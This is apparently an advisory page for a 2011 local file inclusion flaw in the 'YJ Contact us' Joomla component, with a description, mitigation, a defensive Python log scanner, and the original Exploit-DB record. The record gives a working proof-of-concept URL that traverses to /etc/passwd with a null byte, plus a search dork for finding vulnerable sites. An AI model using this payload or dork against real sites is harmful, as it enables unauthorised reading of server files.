Vendor: YJ Contact us - Enhanced Joomla Contact Form
By: MeGo
CVSS: 7.5 (HIGH)
Type: Local File Inclusion
CWE: 22
Product Name: YJ Contact us - Enhanced Joomla Contact Form
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2011

YJ Contact us – Enhanced Joomla Contact Form <= Local File Inclusion Vulnerability

YJ Contact us - Enhanced Joomla Contact Form is vulnerable to a Local File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable application. This can allow the attacker to read arbitrary files from the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
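
One way to check web server access logs for requests matching this advisory, as an added example that is not part of the original advisory: it flags `view` values sent to `com_yjcontactus` that contain traversal sequences, null bytes or anything outside a plain identifier. The log lines are constructed, and the identifier-only rule for legitimate view names is an assumption about the component.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: legitimate view names are plain identifiers (letters, digits, "_").
SAFE_VIEW = re.compile(r"^[A-Za-z0-9_]+$")
# Request line as it appears in common/combined access log format.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def check_view(raw_query):
    """Return the reasons a com_yjcontactus 'view' value looks unsafe."""
    params = parse_qs(raw_query)
    if "com_yjcontactus" not in params.get("option", []):
        return []
    reasons = []
    for value in params.get("view", []):
        # parse_qs decoded once; decode again so an encoded value is
        # judged by what a file operation would finally receive.
        decoded = unquote(value)
        if "\x00" in decoded:
            reasons.append("null byte")
        if ".." in decoded or "/" in decoded or "\\" in decoded:
            reasons.append("path traversal")
        elif not SAFE_VIEW.match(decoded):
            reasons.append("unexpected characters")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            reasons = check_view(urlsplit(match.group(1)).query)
            if reasons:
                hits.append((number, reasons))
    return hits

# Constructed sample log lines (documentation IP addresses, made-up sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Oct/2011:10:00:01 +0000] "GET /index.php?option=com_yjcontactus&view=form HTTP/1.1" 200 5120',
    '203.0.113.9 - - [25/Oct/2011:10:00:05 +0000] "GET /index.php?option=com_yjcontactus&view=../../../etc/passwd%00 HTTP/1.1" 200 1873',
    '203.0.113.4 - - [25/Oct/2011:10:00:12 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```

The same identifier-only check, applied to the `view` parameter before it reaches any file operation, is the input validation the mitigation calls for.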

Exploit-DB raw data:

================================================================================
  
  - YJ Contact us - Enhanced Joomla Contact Form <= Local File Inclusion Vulnerability
   
       Software : YJ Contact us - Enhanced Joomla Contact Form 
       Vendor   : http://www.youjoomla.com/yj-contact-us-enhanced-joomla-contact-form-2.html
       Author   : Mego
       Contact  : nowar204[at]hotmail[dot]com
       Home     : NONE
 
================================================================================
 
  - Exploit
 
       http://localhost/[path]/index.php?option=com_yjcontactus&view=[LFI]
 
 
  - PoC
 
       http://localhost/[path]/index.php?option=com_yjcontactus&view=../../../../../../../../../../../../../../../../../../../etc/passwd%00
 
 
  - Dork
 
       "com_yjcontactus"+view
 
================================================================================
 
  - Greetz
 
       norgod,g0ld,vnc and all brazilian c0ders
 
================================================================================
 
  - October 25 2011 - Morocco